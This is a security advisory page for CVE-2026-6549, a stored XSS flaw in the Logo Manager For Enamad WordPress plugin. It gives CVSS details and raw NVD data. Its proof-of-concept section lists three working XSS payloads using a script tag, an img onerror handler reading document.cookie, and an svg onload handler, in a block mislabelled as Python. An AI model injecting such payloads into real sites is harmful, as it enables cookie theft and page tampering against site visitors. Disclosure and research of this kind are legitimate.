Security Vulnerability Report
中文
CVE-2026-6549 CVSS 6.4 MEDIUM

CVE-2026-6549

Published: 2026-05-20 02:16:39
Last Modified: 2026-05-20 13:54:55

Description

The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Logo Manager For Enamad <= 0.7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-6549 Stored XSS --> <!-- Usage: Insert the following shortcode into a post/page as a Contributor user --> <!-- Payload 1: Injecting script tag --> [vc_enamad_namad title=""><script>alert('CVE-2026-6549_XSS');</script>"></vc_enamad_namad> <!-- Payload 2: Using img onerror handler --> [vc_enamad_shamed title="Payload"><img src=x onerror=alert(document.cookie)>] <!-- Payload 3: Using svg onload handler --> [vc_enamad_custom title="Test"><svg/onload=confirm(1)>]

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6549", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:38.780", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/tags/0.7.4/widgets.php#L295", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/trunk/widgets.php#L295", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/logo-manager-for-enamad", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6d1167-c89d-4c97-9446-b968df945e6c?source=cve", "source": "[email protected]"}]}}